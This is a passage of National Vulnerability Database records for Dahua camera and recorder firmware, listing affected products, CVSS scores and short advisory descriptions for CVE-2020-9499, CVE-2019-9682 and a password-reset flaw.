                     matchCriteriaId: "AEC0287A-824B-46D0-84AB-54BEEF90E16B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5667962D-1A47-4D77-95A4-6B34F8863761",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down.",
      },
      {
         lang: "es",
         value: "Algunos productos Dahua presentan vulnerabilidades de desbordamiento de búfer. Después del inicio de sesión con éxito de la cuenta legal, el atacante envía un comando de prueba DDNS específico, que puede hacer que el dispositivo se caiga.",
      },
   ],
   id: "CVE-2020-9499",
   lastModified: "2024-11-21T05:40:46.800",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "SINGLE",
               availabilityImpact: "PARTIAL",
               baseScore: 6.5,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:L/Au:S/C:P/I:P/A:P",
               version: "2.0",
            },
            exploitabilityScore: 8,
            impactScore: 6.4,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.2,
               baseSeverity: "HIGH",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "HIGH",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 1.2,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2020-04-09T14:15:13.213",
   references: [
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
      },
   ],
   sourceIdentifier: "cybersecurity@dahuatech.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-120",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2020-05-13 16:15
Modified
2024-11-21 04:52
Summary
Dahua devices with Build time before December 2019 use strong security login mode by default, but in order to be compatible with the normal login of early devices, some devices retain the weak security login mode that users can control. If the user uses a weak security login method, an attacker can monitor the device network to intercept network packets to attack the device. So it is recommended that the user disable this login method.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1CE773D-CA5F-483C-B20C-DAD30A590DDD",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C35F4371-334B-4EA8-8F48-498C81652F7C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "083AE420-CAF9-4A2A-8C76-79DD590FA191",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "1EE24474-EF35-4475-99DD-4B54D6AF0B2D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9A075994-60D1-40B7-9EF6-8048CBC18764",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7A3C5893-E1D0-4E06-9F7F-058B657E4493",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F78D2E9E-9909-4130-A146-CA861F7DF341",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "19B57B9D-0729-48E0-892B-E39AE1F89AB4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "18CD222C-C95A-4D5E-A763-5D2F74EAEC04",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "984AD4D5-D689-4150-A1EE-D48B81CBB7C8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ECBC0BF-171E-49FD-B6AF-CC7B29D39FB7",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5BA0D206-5BE7-4592-8D3E-641F47164770",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9E8CB654-0526-4E7A-8984-8350B39BB4DF",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "724F4B7D-C8C1-4914-B1D6-B4CB9B1F4093",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3AEBFC1D-9F25-4FDB-A191-D7D6C1C6E234",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5D6E27D8-C608-49E7-8284-5196EDB428DB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A046C7EA-F954-4F36-9ED3-DBA84F1FB2D3",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B8887C8-C335-4EBB-BC7F-D4F8D8205DAE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCD8DCD2-5CEA-420F-860C-11B469D9FF8F",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F051A1A0-E841-42E7-92A3-E45E4017DCDE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F092AA97-7184-4499-BB83-D6204BD4621B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "FCB3A7FD-63A2-423C-912F-E2E5B4690CF1",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "855B3C5F-CE9D-4FFA-B485-11A8D675F006",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "83B0FAFA-BEF4-4196-A4BC-4CFD6DCF4986",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D0E03DE-1BFA-43AD-9AC6-72A1A1545D4B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B51E9FED-4929-42CC-AA6F-BFF61E8F88C0",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F20B6467-53DC-4DC6-BCC2-6B6B33ABD65D",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EB41CE1D-1A97-4549-A849-D06F78858CA3",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "BFA91720-5AE4-48B6-A940-A4DBE650591D",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n54a4p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D479D171-7F30-4D6B-8A49-0A3967103B94",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ACD4FD87-1D74-4895-AA89-D26541A55433",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7936F0A3-F6DF-47B2-898E-DBE68B369633",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3D5136C6-2355-4782-BF9C-0874DC5B0CDA",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "195D7533-B2EF-4BC2-B6D6-0B141FB90090",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "7180D6E1-6F7F-4EAD-BD51-02C029EFB034",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "03D1AD58-447D-4D30-B9CF-48B5CB743C2B",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "AEC0287A-824B-46D0-84AB-54BEEF90E16B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5667962D-1A47-4D77-95A4-6B34F8863761",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hdbw1320e-w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "1CBF6051-B1DF-4028-ADC1-CF3820C1CA71",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hdbw1320e-w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F221BD07-E754-4355-B031-A95147905815",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Dahua devices with Build time before December 2019 use strong security login mode by default, but in order to be compatible with the normal login of early devices, some devices retain the weak security login mode that users can control. If the user uses a weak security login method, an attacker can monitor the device network to intercept network packets to attack the device. So it is recommended that the user disable this login method.",
      },
      {
         lang: "es",
         value: "Los dispositivos Dahua con tiempo de Compilación antes de diciembre de 2019, usan un modo de inicio de sesión de seguridad fuerte por defecto, pero en función de ser compatibles con el inicio de sesión normal de los primeros dispositivos, algunos dispositivos conservan el modo de inicio de sesión de seguridad débil que los usuarios pueden controlar. Si el usuario usa un método de inicio de sesión de seguridad débil, un atacante puede monitorear la red del dispositivo para interceptar los paquetes de red para atacar el dispositivo. Por lo tanto, es recomendado que el usuario desactive este método de inicio de sesión.",
      },
   ],
   id: "CVE-2019-9682",
   lastModified: "2024-11-21T04:52:06.380",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 6.8,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:P",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 6.4,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "HIGH",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 8.1,
               baseSeverity: "HIGH",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.2,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2020-05-13T16:15:12.870",
   references: [
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/767",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/767",
      },
   ],
   sourceIdentifier: "cybersecurity@dahuatech.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-276",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-01-13 21:15
Modified
2024-11-21 06:08
Severity ?
Summary
Some Dahua products have access control vulnerability in the password reset process. Attackers can exploit this vulnerability through specific deployments to reset device passwords.
Impacted products
Vendor Product Version
dahuasecurity ipc-hx1xxx_firmware *
dahuasecurity ipc-hx1xxx -
dahuasecurity ipc-hx2xxx_firmware *
dahuasecurity ipc-hx2xxx -
dahuasecurity ipc-hx3xxx_firmware *
dahuasecurity ipc-hx3xxx -
dahuasecurity ipc-hx5\(4\)\(3\)xxx_firmware *
dahuasecurity ipc-hx5\(4\)\(3\)xxx -
dahuasecurity ipc-hx5xxx_firmware *
dahuasecurity ipc-hx5xxx -
dahuasecurity sd1a1_firmware *
dahuasecurity sd1a1 -
dahuasecurity sd22_firmware *
dahuasecurity sd22 -
dahuasecurity sd49_firmware *
dahuasecurity sd49 -
dahuasecurity sd50_firmware *
dahuasecurity sd50 -
dahuasecurity sd52c_firmware *
dahuasecurity sd52c -
dahuasecurity sd6al_firmware *
dahuasecurity sd6al -
dahuasecurity tpc-bf1241_firmware *
dahuasecurity tpc-bf1241 -
dahuasecurity tpc-bf2221_firmware *
dahuasecurity tpc-bf2221 -
dahuasecurity tpc-bf5x01_firmware *
dahuasecurity tpc-bf5x01 -
dahuasecurity tpc-pt8x21x_firmware *
dahuasecurity tpc-pt8x21x -
dahuasecurity tpc-sd2221_firmware *
dahuasecurity tpc-sd2221 -
dahuasecurity tpc-sd8x21_firmware *
dahuasecurity tpc-sd8x21 -
dahuasecurity nvr1xxx_firmware *
dahuasecurity nvr1xxx -
dahuasecurity nvr2xxx_firmware *
dahuasecurity nvr2xxx -
dahuasecurity nvr4xxx_firmware *
dahuasecurity nvr4xxx -
dahuasecurity nvr5xxx_firmware *
dahuasecurity nvr5xxx -
dahuasecurity xvr4xxx_firmware *
dahuasecurity xvr4xxx -
dahuasecurity xvr5xxx_firmware *
dahuasecurity xvr5xxx -
dahuasecurity xvr7xxx_firmware *
dahuasecurity xvr7xxx -
dahuasecurity hcvr7xxx_firmware *
dahuasecurity hcvr7xxx -
dahuasecurity hcvr8xxx_firmware *
dahuasecurity hcvr8xxx -
dahuasecurity vtox20xf_firmware *
dahuasecurity vtox20xf -
dahuasecurity asc2204c_firmware *
dahuasecurity asc2204c -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx1xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2BB15A66-CCC4-4CA8-AF25-D8D9A81BE796",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx1xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "BC27C4B9-35AA-4CD1-8E30-97D79CA76B30",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB50E813-E761-4575-B670-4C7F812952CB",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B8887C8-C335-4EBB-BC7F-D4F8D8205DAE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "4EC72741-163E-4659-B3F4-D161925F3DE6",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8936A118-4AB5-4B09-A9FD-E624A68315BD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx5\\(4\\)\\(3\\)xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "40C35319-8C5A-461C-AB41-989B63EF19CB",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx5\\(4\\)\\(3\\)xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F079822C-4C64-41E3-9A17-F9A56D5B5E91",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9AA70CB5-B4C0-48D3-ACE8-FF846083BB70",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F2838BDA-97FF-498E-BC81-955D31B9227A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd1a1_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F4C3A6AD-19F7-4325-89B4-944B8393C739",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd1a1:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "88AD58DE-D990-4C98-853B-21B79CD07EEC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd22_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ECB8CCE-F925-437B-8B6E-4690B92D4F80",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd22:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "428852DE-BDE3-4CE4-972C-821E88C7F930",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd49_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "31D5F604-135F-4F17-8093-EE8AEA0408AF",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd49:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "627C0AE8-01B2-4807-8284-EFE6140598B5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "8EBB0CC4-4B58-46A4-83FC-11744B2A145B",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "984AD4D5-D689-4150-A1EE-D48B81CBB7C8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0DFAF598-BDBD-4351-A72A-136F606AD8D5",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5BA0D206-5BE7-4592-8D3E-641F47164770",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F61D99F5-DE6B-445F-93B6-ECC2DFC41122",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C35F4371-334B-4EA8-8F48-498C81652F7C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-bf1241_firmware:*:*:*:*:*:*:*:*",
